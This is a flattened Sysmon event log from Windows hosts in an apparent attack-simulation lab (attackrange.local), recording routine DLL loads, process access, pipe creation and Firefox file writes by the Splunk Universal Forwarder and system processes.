17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531221Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531220Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531219Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531218Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531217Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531216Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531215Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531214Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x80000000000000001531213Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531212Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531211Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531210Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531209Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531208Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531207Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531206Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531205Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531204Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531203Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531202Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531201Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531200Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531199Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531198Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531197Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001531196Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531195Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531194Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001531192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531189Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531188Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001531187Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.328{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531186Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531185Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.329{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531184Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531183Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531182Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531181Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531180Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531179Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001531178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.159{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm2021-04-21 17:30:33.159 11241100x80000000000000001531177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.159{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal2021-04-21 17:30:33.159 10341000x80000000000000001061193Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:33.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061192Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:33.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061196Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:34.062{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061195Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:34.062{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001531294Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x80000000000000001531293Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}62082948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 